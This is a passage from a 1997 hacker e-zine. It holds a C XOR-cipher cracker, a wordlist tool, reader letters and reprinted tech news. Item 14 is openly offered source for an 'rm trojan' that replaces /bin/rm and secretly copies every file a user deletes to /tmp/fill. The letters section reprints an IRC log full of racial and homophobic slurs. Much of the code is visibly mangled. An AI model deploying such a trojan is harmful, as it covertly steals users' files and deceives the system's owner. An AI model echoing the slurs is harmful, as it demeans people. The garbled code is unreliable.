(!feof(file1)) fgets(buffer, sizeof(buffer), file1); result -= 1; /* Get rid of extra char */ for (j=1; j < result + 1; j++) { b = i ^ buffer[j]; if ((b == 10) || (b == 13) || (b == 32) || (b == 97) || ((b > 97) && (b < 123))) count[j] = count[j] + 1; } } for (j=1; j < keysize + 1; j++) { if (count[j] > maxcount[j]) { key[j]=i; maxcount[j]=count[j]; putchar('.'); } } printf("\nDone!\n"); fclose(file1); } void Decrypt(char *infile, char *outfile, int keysize) { FILE *file1, *file2; int i, j, result; char ifeof; printf("Decrypting"); sleep(1); file1=fopen(infile, "r"); file2=fopen(outfile, "w"); while (ifeof != EOF) { /* Get the size in bytes */ ifeof = getc(file1); result += 1; if (result >= sizeof(buffer)) break; } rewind(file1); while (!feof(file1)) fgets(buffer, sizeof(buffer), file1); result -= 1; /* Get rid of extra char */ for (j=1; j < result + 1; j++) { buffer[j] = buffer[j] ^ key[j]; putchar('.'); } result = fputs(buffer, file2); /* does this have to only */ /* write 'i' bytes? */ fclose(file1); fclose(file2); printf("\n\nDone!\n"); } void main(int argc, char **argv) { printf("Min key size: "); scanf("%d", &minkeysize); printf("Max key size: "); scanf("%d", &maxkeysize); printf("Enter ciphertext: "); scanf("%s", &inpath); for (i = minkeysize; i < maxkeysize; i++) { outpath = "cracked.txt"; Crack(inpath, i); putchar('\n'); Decrypt(inpath, outpath, i); putchar('\n'); } } ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 13 of 16 word.c By memor, thtj staff writer memor@mygale.org /* Here is some wordlist processing program fastly done by memor for thtj16 realesed on Tue Oct 21 18:55:02 199 v0.001 well , i'll comment the code , if u want to improve it, no matters if u want to improve it.. :) way u could do to improve it: -make structurs type file to stock words got and wont write exactly the 2 same words in the outpout file -make a third argument as a integer type (with atoi) to put a word size to save.. instance: dont save the words in the outpout file if they have less than 3 caracters l8r, memor@mygale.org */ /* includes necessary to commands printf..,fopen..*/ #include #include #include /* main function using arguments (argc, argv) */ void main(int argc,char *argv[]) { /* defining FILE type pointers for input file and outpout file char type variable cara for read/wrote caracter integer type test and testa for testing when a caracter has to be replaced as a \n in the outpour file, or when their is twice caracter to be replaced.. string char(30) type for nsource and ndest, for the input and outpout filenames */ FILE *source; FILE *dest; char cara; int test=0; int testa=1; char nsource[30]; char ndest[30]; /* checking their is enough arguments */ if(argc<3) { printf("memor 1997-98 v0.01\n"); printf("usage: %s textfile wordfile\n",argv[0]); exit(1); } /* writting in nsource the source filename writting in ndest the destination filename */ sprintf(nsource,"%s",argv[1]); sprintf(ndest,"%s",argv[2]); /* opening source and cheking btw if source exists */ source=fopen(nsource,"r"); if(source==NULL) { printf("File does not exists..\nAborted..\n"); exit(1); } /* opening outpout file and checking no errors in it */ dest=fopen(ndest,"w"); if(source==NULL) { printf("Can't open file..\nAborted..\n"); exit(1); } /* begining processing and ending on EOF caracter */ do { /* getting caracter from input file */ cara=fgetc(source); test=0; /* checking if caracter between 0 and 9, a and z or A and B and writting it if the condition is true. */ if(cara>'0'-1 && cara<'9'+1) { fputc(cara,dest); test=1;testa=0; } if(cara>'a'-1 && cara<'z'+1) { fputc(cara,dest); test=1;testa=0; } if(cara>'A'-1 && cara<'Z'+1) { fputc(cara,dest); test=1;testa=0; } /* if the condition was FALSE and no \n written in the outpout file before, writting it */ if(test==0 && testa!=1) { fputc(13,dest); fputc(10,dest); testa=1; } } while(cara!=EOF); /* closing file for ending that clean job :) */ fclose(dest); fclose(source); } ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 14 of 16 rm.c Fix By Shok, Staff Writer shok@sekurity.org /* --------------------------------- */ /* rm trojan by --==+*~(Shok)~*+==-- */ /* Email: shok@sekurity.org */ /* --------------------------------- */ #include #include #include #include #include void main(int argc, char **argv) { struct stat filestats; int i; int recursive, verbose, force, interactive; int c; if (argc > 2) { while((c = getopt (argc, argv, "Rrifv:")) != -1) switch (c) { case 'R': case 'r': recursive = 1; break; case 'i': interactive = 1; break; case 'f': force = 1; break; case 'v': verbose = 1; break; case '?': if(isprint (optopt)) fprintf (stderr, "Unknown option '-%c'.\n", optopt); else fprintf (stderr, "Unknown option character `\\x%x'.\n", optopt); exit(1); default: break; } } else if (argc == 2) { setenv("PROGRAM", argv[1], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); execl("/bin/rm.bak", "rm", argv[1], NULL); unsetenv("PROGRAM"); exit(0); } else { exit(0); } /* Well....got a better idea? */ if ((interactive == 1) && (verbose != 1) && (force != 1) && (recursive != 1)) goto interactive; if ((force == 1) && (verbose != 1) && (interactive != 1) && (recursive != 1)) goto force; if ((verbose == 1) && (interactive != 1) && (force != 1) && (recursive != 1)) goto verbose; if ((recursive == 1) && (verbose != 1) && (force != 1) && (interactive != 1)) goto recursive; if ((recursive == 1) && (force == 1) && (interactive != 1) && (verbose != 1)) goto rf; if ((recursive == 1) && (force != 1) && (interactive == 1) && (verbose != 1)) goto ri; if ((recursive == 1) && (force != 1) && (interactive != 1) && (verbose == 1)) goto rv; if ((recursive == 1) && (force == 1) && (interactive != 1) && (verbose == 1)) goto rfv; /* If we made it to here something is wrong */ fprintf(stderr, "Unknown error.\n"); exit(1); interactive: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-i",argv[2],NULL); } exit(0); force: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-f",argv[2],NULL); } exit(0); verbose: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-v",argv[2],NULL); } exit(0); recursive: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-r",argv[2],NULL); } exit(0); rf: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rf",argv[2],NULL); } exit(0); ri: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-ri",argv[2],NULL); } exit(0); rv: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rv",argv[2],NULL); } exit(0); rfv: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rfv",argv[2],NULL); } exit(0); } ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 15 of 16 Oddville, THTJ By Scud-O, Editor in Chief scud@thtj.com Oddville, THTJ for the Month of October [01] Fwd: Bronc vs. Jericho, Modify [02] eReEt MiXeD cApS hErE [03] Help Wanted on IP Spoofing, g8 way2 [04] Information on the thtj Mailing List, FH [05] Is The Mailing List Up Yet?, Peter [06] No New Membership Openings [07] Praise. [08] Sex Sites Will Never Be In THTJ, John Doe [09] Hackers of the world, please help you? , Acid Burn [10] Let's Link,Frank Bertotti [11] Havoc, The Program? [12] Trying to Learn, Jeff [13] AOL Chat Room 'Punter', HESTUD Note: Well, once again, thanks to nethosting.com, Oddville is light on content, since well, there is a less that 10% chance that your mail actually got thru nethosting's mail servers! Next month, this should all be resolved, since we are *finally* moving. --- [ Fwd: Bronc vs. Jericho ] Date: Thu, 02 Oct 1997 03:05:22 -0400 From: Modify Organization: Global kOS X-Mailer: Mozilla 2.01KIT (Win95; U) To: xxxxx@xxx.xxx CC: xxxxx@xxxxx.xxx, xxxx@xxxxxx.xxx, xxx@xxxxxxxxxxx.xxx Subject: [Fwd: Forwarded mail....] Welp, good ol bronc has done it again... he now has slammed me and Jericho on this log that Jericho has sent me... Jericho is the one without the full address within the nick... he is (-[Bronc]-) and the "real" bronc buster is [Bronc(Bronc_Bust@pwrrack38.succeed.net)] -- Modify ----------oOo------------------------------------------0 HACP: http://members.tripod.com/~ListedBlack/index2.htm Global kOS: http://www.thtj.com/kOS ls -l | awk '{size = size + $5; print size}' Security is an on going process.. just dont fall behind ----------oOo------------------------------------------0 Received: from mx01.erols.com (mx01.erols.com [205.252.116.65]) by mail0.erols.com (8.8.5/8.7.3/970701.001epv) with ESMTP id AAA17642 for ; Thu, 2 Oct 1997 00:36:51 -0400 (EDT) From: jericho@dimensional.com Received: from blackhole.dimensional.com (blackhole.dimensional.com [208.206.176.10]) by mx01.erols.com (8.8.5/8.8.5/MX-mnd) with ESMTP id AAA25408 for ; Thu, 2 Oct 1997 00:36:50 -0400 Received: from flatland.dimensional.com (sendmail@flatland.dimensional.com [208.206.176.24]) by blackhole.dimensional.com (8.8.7/8.8.nospam) with ESMTP id WAA06246 for ; Wed, 1 Oct 1997 22:36:48 -0600 (MDT) Received: from flatland.dimensional.com (718@flatland.dimensional.com [208.206.176.24]) by flatland.dimensional.com (8.8.7/8.8.7) with SMTP id WAA05944 for ; Wed, 1 Oct 1997 22:36:46 -0600 (MDT) Date: Wed, 1 Oct 1997 22:36:46 -0600 (MDT) To: Modify Subject: Forwarded mail.... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-UIDL: fab0bf073e X-Mozilla-Status: 0001 pass this around. [10:19pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] youre a poor bitch [10:19pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] I can see that now [10:19pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] everything i was told was right [10:19pm] (-[Bronc]-) At least I have a clue. [10:19pm] (-[Bronc]-) I know how to hack for one thing, and I know the definition of slander [10:19pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] good, then you know how lame your pals are (this is between you and me, why bring others into it?) [10:20pm] (-[Bronc]-) this has nothing to do with them. just your lame mail about me that you didnt have the balls to cc me in on. [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] what mail? [10:20pm] (-[Bronc]-) Yup.. the mail all about me and your stupid assumptions you dumb nigger. (the mail said I was stalling on setting up a server in order to shut him down) [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] you mean the one Modify sent out (what, he sent it from your account? The headers were not forged.) [10:20pm] (-[Bronc]-) no.. the one YOU sent out. [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] telling everyone how you were keeping me shut donw? [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] making fu of me (my *reply* made fun of you) [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] I sent no mail [10:20pm] (-[Bronc]-) I sent out the reply you dumb bitch [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] I got modifys and yours [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] both dogging me [10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] you need to pull your head out [10:21pm] (-[Bronc]-) The server wasnt up until a week ago. Had nothing to do with shutting you down [10:21pm] (-[Bronc]-) You need to pull more than your head out. [10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] your pal is playing you for a fool [10:21pm] (-[Bronc]-) get your dick out of a horses ass and wake up. [10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] hahaha [10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] Modify has his dick in your ass [10:21pm] (-[Bronc]-) better than a horse [10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] and you dont even know it [10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] what a sucker [10:21pm] (-[Bronc]-) yes, you are. [10:22pm] (-[Bronc]-) you got suckered by Carolyn of all people. [10:22pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] suckered? [10:22pm] (-[Bronc]-) yup [10:22pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] man he is fucking up in the ass [10:22pm] (-[Bronc]-) You almost have a clue about the whole picture. [10:22pm] (-[Bronc]-) go away fag [10:22pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] how gullible [10:22pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] everyone laughs at you outside your little sircle [10:22pm] (-[Bronc]-) sure they do [10:23pm] (-[Bronc]-) circle btw [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] just like I do [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] youll see soon enough (OOh! Just like Carolyn, a vague threat) [10:23pm] (-[Bronc]-) like you matter? you cant hack your way out of a horses ass. [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] it won;t be long tell he wants to jizz on you to [10:23pm] (-[Bronc]-) what, another vague threat? imagine that. [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] grow up [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] youre soooooooo small (then what does that make you?) [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] lame ass spending 24/7 on IRC k/b ppl (Why the *fuck* do people assume that? I am actively typing on IRC less than an hour a day.) [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] listening to that lame ass [10:24pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] letting him play you for a fool [10:24pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] hahaha [10:24pm] (-[Bronc]-) why the fuck you do you assume i am here 24/7? you are so ignorant. [10:24pm] (-[Bronc]-) go away monkey [10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] loser [10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] send me some pics of him jizzinf on you [10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] hahah [10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] what a chump [10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] auto kick/ban (that was a manual kick) [10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] wont even talk like a mature adult ("loser" "what a chump" and all the comments about jizz.. and you say I am not mature? pot -> kettle -> black) [10:26pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] but i forgot, youre an IRC kiddie (I can still hack, something you can't. The only thing you can do, code HTML, is barely a skill, and you do it very poorly.) [10:26pm] (-[Bronc]-) an irc kiddie that knows something about security. an irc kiddie that is on maybe half an hour a day. you ignorant bitch [10:26pm] (-[Bronc]-) go the fuck away horse ass [10:26pm] (-[Bronc]-) you cant even do HTML worth shit lamer [10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] thats why youre idle time was over 2 hours (exactly. Because I check messages here and there. Duh) [10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] hahaha [10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] little kid [10:27pm] (-[Bronc]-) exactly. i check in here and there for messages. duh [10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] thats all you are [10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] long haired kiddie [10:27pm] (-[Bronc]-) little kid that is a lot smarter than you. must make you feel like an ass. [10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] pleas [10:27pm] (-[Bronc]-) hair length? that is a mature insult [10:27pm] (-[Bronc]-) ignoring your dumb ass --- [ eReEt MiXeD cApS hErE ] Date: Fri, 03 Oct 1997 03:21:09 -0700 From: xxxx@xxxxxxxxxx.xxx (xxxxx, xxxxx) X-Mailer: Mozilla 3.0 (Win95; U; 16bit) To: scud@thtj.com Subject: SuP yO dAwG.i Am KiNd Of NeW aT tHiS sO bArE wItH mE.dO yOu HaVe AnY hAkInG fIlEs I cAn DoWnLoAd.I rEaD mOsT oF tHe FiLeS yOu GoT bUt I nEeD sOmE fOr ReFrEnCe. [ try thtj.com/files.html for a few, but get off of your lazy butt, and do some searching for files. A site that readily comes to mind is my good friend JP's site: http://www.antionline.com/ . Oh, and by the way, learn to change your name in Netscape Mail, since i really *doubt* that your mom would approve of you 'hAkInG'. ] --- [ Help Wanted on IP Spoofing ] X-Originating-IP: [130.133.217.173] From: "g8 way2" To: scud@thtj.com Subject: i dont know where to go? Date: Sun, 05 Oct 1997 14:44:37 PDT hello, and sorry for using you time, but i did not know where to go with my question.. Is it possible to spoof, say an ftp-server, with a different hostname, than the one you're dialing in from.. i'm not talking about altering your ID, i know how to do that, but how to alter your ip..i've read some of your mags, but couldn't find an answer :-( Sorry if i'm at the complete wrong table here, but if you know where i can obtain info on this i would be very gratefull too,,,, btw your e-zine is good reading ( <--- = obligatory asslicking line) thanks,,, g8way2 ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com [ Go get jizz.c ( thtj.com/jizz.c ) of the like, and run it on your unix box. All the instructions should be there, and they are fairly self explainitory However, you must be root for this to work, and have a fair knowledge of unix, so this is not for the beginner. ] --- [ Information on the thtj Mailing List ] Date: Mon, 6 Oct 1997 06:37:47 -0500 (CDT) X-Sender: xxxxx@xxx.com X-Mailer: Windows Eudora Light Version 1.5.2 To: scud@thtj.com From: FH Subject: Welcome to thtj See i joined.. but you might want to add WHAT ADDRESS YOU MAIL TOO NOW. it doesnt say 'to send out mail send it to xxxxxxx@terminus.orc.ca Or is that even where it goes? You want me to write up a file for this shit so when you subscribe it sends back with like stuff about the list and all that other information? >Date: Sun, 5 Oct 1997 19:38:25 -0400 (EDT) >X-Authentication-Warning: terminus.orc.ca: majordomo set sender to owner-thtj@terminus.orc.ca using -f >To: typeo@qni.com >From: majordomo@terminus.orc.ca >Subject: Welcome to thtj >Reply-To: majordomo@terminus.orc.ca > >-- > >Welcome to the thtj mailing list! > >Please save this message for future reference. Thank you. > >If you ever want to remove yourself from this mailing list, >you can send mail to with the following >command in the body of your email message: > > unsubscribe thtj > >or from another account, besides xxxxx@xxx.com: > > unsubscribe thtj xxxxx@xxx.com > >If you ever need to get in contact with the owner of the list, >(if you have trouble unsubscribing, or have questions about the >list itself) send email to . >This is the general rule for most mailing lists when you need >to contact a human. > > Here's the general information for the list you've subscribed to, > in case you don't already have it: > > > [ Editor's Note: The THTJ Mailing list we have it for THTJ Distro _only_. This majordomo is not an open majordomo, we will only be distroing thtj from it. We are currently setting up another domo that will be open, so all of you mugs can talk til your dead. ] --- [ Is The Mailing List Up Yet? ] From: "Peter xxx" Organization: To: webmaster@thtj.com Date: Wed, 1 Oct 1997 13:29:03 MET Subject: I don't like coffee ... Priority: normal X-Mailer: Pegasus Mail for Windows (v2.53/R1) ... but I'd like to know when you will give live to the mailing-list mentioned on your site... Greetings from Germany - actually raining :( Peter [ Peter, you are in luck, thtj has opened the mailing list. To join it, send mail to: majordomo@terminus.orc.ca , with the body reading : subscribe thtj ] --- [ No New Membership Openings ] Date: Sun, 5 Oct 1997 18:21:57 -0400 (EDT) From: xxxxxxx To: thtj@thtj.com Subject: memership hi sorry to bore you with shit like that, but i am interesting in becoming a member of your group and wonder if you have any tests or something..i also wanna wask if i have to be a member to write articles for the mag. thanks .. bye 4 now -- xxxxxxx [ Just so everyone knows, neither thtj or hbs are looking for new members. thtj does incourage people to write for thtj, since it is open for anyone and everyone to write for, and after several articles, we may let you onto the staff as a staff writer. However, there are no tests for this, so just go write some articles. ] --- [ Praise. ] Date: Tue, 07 Oct 1997 19:50:13 -0500 From: xxxxxxx Organization: xxxxxx X-Mailer: Mozilla 4.01 [en] (Win95; U) To: scud@thtj.com Subject: Hey Just wanna give you big props on issue 15 yet another great thtj, you guys own. Keep up the good work... [ Thank you, we try our best. ] --- [ Sex Sites Will Never Be In THTJ ] X-Originating-IP: [200.241.100.130] From: "John Doe" To: scud@thtj.com Subject: havoc Date: Fri, 17 Oct 1997 14:36:33 PDT Hi! I think Havoc simply COOL! :) I'd like to give a suggestion for the november edition: "How to hack sex sites". Today many people use hacked accounts to enter porn sites and teaching how to do it would be very helpful. Thanks and good bye! [ Two letters and one punctuation for you: NO! THTJ Will *never* publish anything about sex sites. That is just plain sick. There is no 'hacking' involved in sex sites, all you have to do, is probably just card an account. This is not hacking, this is no anything useful, so thtj will never print anything like this. Go get a girlfriend.] --- [ Hackers of the world, please help you? ] Date: Fri, 24 Oct 1997 23:28:27 -0700 (PDT) From: Acid Burn Subject: HELP!!! To: scud@thtj.com, keystroke@thepentagon.com, reaper@linenoise.org Cc: thtj@thtj.com, alienphreak@linenoise.org Hackers of the world PLEASE HELP ME!!! I am in desperate need of your help!!!! Please can you mail me all the passwords together with their User IDs and which system they are for as well as all the dialup codes etc. that you have in your collection. This is URGENT!! Please reply as soon as possible. (My friends life depends on it) Please forward this message to all hackers you know. Thanks a million. Acid Burn _____________________________________________________________________ Sent by Yahoo! Mail - http://mail.yahoo.com [ What the fuck is this bull shit? You friend's life depends on collecting passwd files? yea right. ] --- [ Let's Link ] Date: Sun, 26 Oct 1997 17:24:37 -0700 (MST) From: grant@letzlink.com To: scud@thtj.com Subject: Let's Link Visit Let's Link at http://www.letzlink.com/ I invite you to visit Let's Link .... perhaps, our Let's Link & Links section. Although, our "Add Your Link" service is FREE, we do ask you to reciprocate with a LINK at your site .... not required but highly appreciated. .... please review our instructions for linking before adding your site. Let's Link is a highly interactive Information Resource Center and a Global Gateway to thousands of The Best Sites on the "Net". Primary links include: Global Travel Guide; Education Network; Career Services; SharewareNET; Product Showcase; Worldwide Marketplace, Art; Catalogs; Real Estate Corner; Shoppers Paradise and much more. Let's Link is a family friendly site. Our site visitation now exceeds 4,300 per/day! 25% Europe.... 70% North America... 5% Asia I hope you find our Information Resource Center useful. Regards, Frank Bertotti http://www.letzlink.com [ Sorry, but i *really* doubt that thtj.com would qualify as a 'family' site.] --- [ Havoc, The Program? ] From: AMando5454@aol.com Date: Sat, 25 Oct 1997 17:06:43 -0400 (EDT) To: thtj@thtj.com Subject: Havoc We are looking for the program, Havoc. If you have any information that you think will be helpful, we would appreciate any help. Thank You [ Twice now i have gotten this. WHAT THE FUCK IS 'Havoc, the program'? i demand to know. ] --- [ Trying to Learn ] Read-Receipt-To: "Jeff" Priority: Normal X-MSMail-Priority: Normal To: scud@thtj.com From: "Jeff" Date: Fri, 31 Oct 97 09:01:31 PST X-MIME-Autoconverted: from quoted-printable to 8bit by id TAA11759 i will like to learn how to get programs to crack codes and to create virusis please help [ try going to yahoo and searching for information. ] --- [ AOL Chat Room 'Punter' ] From: HESTUD Date: Sat, 1 Nov 1997 05:05:54 EST To: scud@thtj.com Subject: how to get a punter Organization: AOL (http://www.aol.com) X-Mailer: Inet_Mail_Out (IMOv10) dear scud-o ive been searching your link and i think its very interesting . i was wondering if you can send me a punter for aol chat rooms. this would be a great help or least find out how i can get one. hestud [ try yahoo or something. ] ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 16 of 16 The News Compiled by KungFuFox, Executive Editor kungfufox@thtj.com 1 : Spammers beware: Usenet2 not for you 2 : S/MIME Cracked by a Screensaver 3 : Webmaster Lets Sites Hack Themselves 4 : High-Tech Burglar Alarms Expose Intruders 5 : WorldCom Bid Threatens BT-MCI Merger 6 : U.S. cell phone industry battles service thieves 7 : Junk Mail Giant Cyber Promotions Is Back Online 8 : Electric Outlets Could Be Link To the Internet 9 : Coming Soon: Net Access Through Power Lines 10: GTE Makes $28B Cash Offer For MCI 11: GeoCities Sites Blocked In South Korea _____________________________________________________________ Spammers beware: Usenet2 not for you Network World, September 22, 1997 A new, spam-free version of the Internet-based bulletin board system Usenet is being developed. Called Usenet2 or U2, the network will use monitoring software and a strict set of community rules to create a spam-free environment. Spam refers to unwanted mass postings to Usenet discussion groups. According to some estimates, 80% of the messages now posted on Usenet are spam or spam "cancels," which are messages that try to delete spam from servers. Several Internet service providers have agreed to support Usenet2, including ZippoDot Com and PANIX. Usenet2 will use monitoring software called Net-Monitor which can filter out binary posts and any post that is being sent to more than 3 newsgroups. Systems that agree to carry Usenet2 must also obey a strict set of rules including real return e-mail addresses on postings. If a system breaks the rules, it can have its Usenet2 feed disconnected. _____________________________________________________________ S/MIME Cracked by a Screensaver by Simson Garfinkel 26.Sep.97.PDT -- Cracking encrypted email just got much easier - as long as the message was encrypted with Netscape Navigator or Microsoft's Outlook Express. Bruce Schneier, a cryptography consultant based in Minnesota, has created a Windows 95 screensaver that cracks encrypted email messages on computers that are otherwise unused. "On average, it takes 35 days on a 166 MHz Pentium," said Schneier, who is also the author of the book Applied Cryptography. The real power of Schneier's program is that it's designed to work on multiple machines in parallel over a local-area network. Got an office with a dozen machines? You can crack a message in a little less than three days. Got a thousand? Your wait will be just 50 minutes. The program, which began as a screensaver that searched for large prime numbers, will be made available on Schneier's Web site today. The program will only crack messages encrypted with RSA Data Security's S/MIME mail encryption standard, and at that, only messages that are encrypted with a 40-bit key. But that's exactly the encryption that's being offered today by the most commonly used versions of Netscape Messenger and Microsoft Outlook Express. "What really pisses me off is that [these products] are being marketed as secure," said Schneier. "The products don't say that they use 40-bit encryption - be careful. They say this is security." The S/MIME standard implemented by Netscape and Microsoft does provide for higher-level security by using different encryption algorithms. But Schneier maintains that messages encrypted with these stronger algorithms cannot be exchanged between the two vendors' products. "The S/MIME security standard is really hard to work with," said Schneier. "None of [the products] interoperate at any level other than 40-bit RC2." Schneier says he's releasing his program to demonstrate the fundamental vulnerabilities in the S/MIME standard. But S/MIME's maker disagrees, saying there is no problem using longer keys. "Bruce is mistaken," said Scott Schnell, vice president of marketing for RSA Data Security, the co-author of the S/MIME specification. "We have mail messages on file in our interoperability test lab which demonstrate interpretability between Outlook Express and Netscape's Messenger using triple-DES," which has a 168-bit key. ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Webmaster Lets Sites Hack Themselves by Mike Tanner 25.Sep.97.PDT -- When A.H.S. Boy secured the domain graphics.com this month for a nonprofit Web resource for graphic designers he was building, it seemed like a real coup for his nascent site. That is, until the address started logging thousands of hits while it still consisted merely of an "under construction" marker page. It soon became apparent that the flood of links was caused by a browser quirk that caused certain kinds of badly-coded graphics URLs to link to his domain. Boy seized upon the serendipitous glitch as an opportunity to passively hack those sites that erroneously linked to his, loading them with banners featuring subversive slogans. For the past several weeks, therefore, unwary visitors to sites, including those for such corporate and political powers as Packard Bell, Corel, and the government of Hong Kong, have been confronted with graphics telling them, "You are only a resource for profit" or, "Revolution is the most beautiful word." "Of course returning these very subversive graphics that some of these sites are getting, probably won't make the owners of these sites very happy," says Boy, who runs sites for a situationist organization, an Austrian arts group, a bookstore, and his own shareware business off the same server. To show there's no ill-will intended, however, he puts the URL to his site on all the banners, and offers a page explaining how to fix the broken links. Since many webmasters put their graphics files in a folder labeled "graphics," the "hack" takes advantage of intelligent browsers' default tendency to interpret "graphics" in badly-coded links as "www.graphics.com." The problem is exacerbated when visitors to a site mistype its URL with a question mark instead of a slash. Boy says that almost half of his server's current traffic of 1,500 daily hits are from these errors. When this plethora of hits began showing up on his site, Boy simply adapted a randomized error-page system he had designed for avoiding static 404 messages on his own site. Now when graphics.com gets a graphics request, a CGI script randomly serves up one of 11 slogans. Netscape spokesman Christopher Hoover says this is the first time his company has heard of this kind of problem associated with their browser's ability "for resolving these kinds of conflicts" by adding .com to links - a feature which generally provides a useful coding shortcut. He says it's a quirk that's due to the near ubiquity of "graphics" as the name for the folder holding a Web site's art files, and that there's unlikely to be another domain name of similar vulnerability. Despite Boy's efforts to help sites remedy the underlying code problems, his prank has provoked a number of mystified and angry messages from surfers and site administrators. One "irate webmaster" from a computer reseller's site even threatened to alert the FBI's computer security division, but so far no legal actions have been taken. And Boy isn't particularly worried that they will be, since he never touches anybody else's site. "Their servers are hacking mine," he says. "I'm just controlling it." ©1993-97 Wired Ventures, Inc. _____________________________________________________________ High-Tech Burglar Alarms Expose Intruders 09/18/97 By Rutrell Yasin, InternetWeek If you're not thinking about installing "burglar alarms" on your network, chances are you will soon. An emerging class of high-tech intrusion detection systems -- also known as burglar alarms -- promises to alert IT administrators when their network security is breached by unauthorized intruders. Security companies such as Axent Technologies, Internet Security Systems, Intrusion Detection, and the WheelGroup are shipping tools that give corporations a layer of defense that goes beyond the firewall. Network General earlier this month became the first networking vendor to enter the fray with CyberCop, a tool that monitors networks for external and internal attacks. "Firewalls are very important. They can be very effective, but they can't do everything. They can be circumvented," said Richard Power, director of research and publications at the Computer Security Institute, in San Francisco. Firewalls protect gateways to the network, but in today's complex Web of private networks, intranets and extranets, the Internet is not the only entrance to the network, Powers said. Firewalls are usually placed in front of Internet access links, wide-area links, and dial-in servers to monitor the protocols and services that flow in and out of a network. But they cannot tell when security has been breached, and they tend to slow network performance when they are deployed in internal networks. Working In Perfect Harmony Intrusion-detection systems complement firewalls by monitoring the network and performing real-time capture and analysis of packet headers and content data. Using sophisticated algorithms to recognize attacks, intrusion-detection systems can send alerts to administrators to warn them of possible break-ins. Some products can even stop intruders from breaking into the network. In the past, intrusion detection was a very labor-intensive, manual task, said Jude O'Reilley, a research analyst at Gartner Group's network division, in Stamford, Conn. "However, there's been a leap in sophistication over the past 18 months," and a wider range of automated tools is hitting the market, he said. Network General's intrusion-detection system draws on the company's experience in delivering packet-level analysis systems -- such as the popular Sniffer analyzer -- to provide a network-based security system, according to Katherine Stolz, product manager for Internet security systems at Network General, in Menlo Park, Calif. CyberCop uses algorithms from the San Antonio-based WheelGroup and consists of sensors, a management server, and a Java-compliant browser. Sensors capture data packets and analyze them for suspicious behavior. Data packets are saved in an "Evidence Trace File" to record attackers' 